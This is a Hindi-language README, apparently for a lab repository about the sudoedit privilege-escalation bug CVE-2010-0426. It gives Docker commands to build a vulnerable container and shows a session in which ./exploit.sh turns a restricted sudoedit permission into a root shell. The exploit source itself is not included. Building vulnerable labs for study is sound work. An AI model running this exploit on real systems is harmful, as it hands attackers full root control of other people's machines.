
Sudo 1.6.x <= 1.6.9p21 और 1.7.x <= 1.7.2p4 स्थानीय विशेषाधिकार वृद्धि और संवेदनशील कंटेनर
Sudo (su "do") सिस्टम प्रशासक को कुछ उपयोगकर्ताओं (या उपयोगकर्ताओं के समूहों) को रूट के रूप में कुछ (या सभी) कमांड चलाने की क्षमता देने की अनुमति देता है, जबकि सभी कमांड और तर्कों को लॉग करता है।
अपने परीक्षण के लिए एक संवेदनशील वातावरण स्थापित करने के लिए आपको Docker स्थापित करना होगा, और बस निम्नलिखित कमांड चलाएँ:
docker build -t privesc/cve-2010-0426 .
docker run --rm -it privesc/cve-2010-0426
और यह कम उपयोगकर्ता विशेषाधिकारों के साथ एक इंटरैक्टिव शेल उत्पन्न करेगा।
बग sudoedit में पाया गया था, जो 'sudoedit' कमांड को सही ढंग से संभाल नहीं पाता, यह एक दुर्भावनापूर्ण उपयोगकर्ता को वास्तविक sudoedit कमांड को एक मनमाना कमांड से बदलने की अनुमति देता है।
स्थानीय हमलावर इस मुद्दे का फायदा उठाकर 'root' उपयोगकर्ता के रूप में मनमाने कमांड चला सकते हैं। सफल शोषण प्रभावित कंप्यूटर को पूरी तरह से समझौता कर सकता है।
इस लक्ष्य का शोषण करने के लिए बस चलाएँ:
./exploit.sh
यदि आप इस संवेदनशील इमेज का उपयोग कर रहे हैं, तो आप बस चला सकते हैं:
user@023b47ff82ca:~$ sudo -V
Sudo version 1.7.2
user@023b47ff82ca:~$ sudo -l
User user may run the following commands on this host:
(root) NOPASSWD: sudoedit /etc/fstab
user@023b47ff82ca:~$ ./exploit.sh /etc/fstab
[+] CVE-2010-0426 exploit by t0kx
[+] Prepared sudoedit...
[+] Run sudoedit
root@023b47ff82ca:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
root@023b47ff82ca:/tmp#
यह दोष Slouching द्वारा पाया गया था।
यह या पिछला प्रोग्राम केवल शैक्षिक उद्देश्य के लिए है ONLY. बिना अनुमति के इसका उपयोग न करें। सामान्य अस्वीकरण लागू होता है, विशेष रूप से यह तथ्य कि मैं (t0kx) इन प्रोग्रामों द्वारा प्रदान की गई जानकारी या कार्यक्षमता के प्रत्यक्ष या अप्रत्यक्ष उपयोग से होने वाली किसी भी क्षति के लिए उत्तरदायी नहीं हूँ। लेखक या कोई भी इंटरनेट प्रदाता इन प्रोग्रामों या उनके किसी भी व्युत्पन्न की सामग्री या दुरुपयोग के लिए कोई जिम्मेदारी नहीं वहन करता है NO. इन प्रोग्रामों का उपयोग करके आप इस तथ्य को स्वीकार करते हैं कि इन प्रोग्रामों के उपयोग से होने वाली कोई भी क्षति (डेटा हानि, सिस्टम क्रैश, सिस्टम समझौता, आदि) t0kx की जिम्मेदारी नहीं है।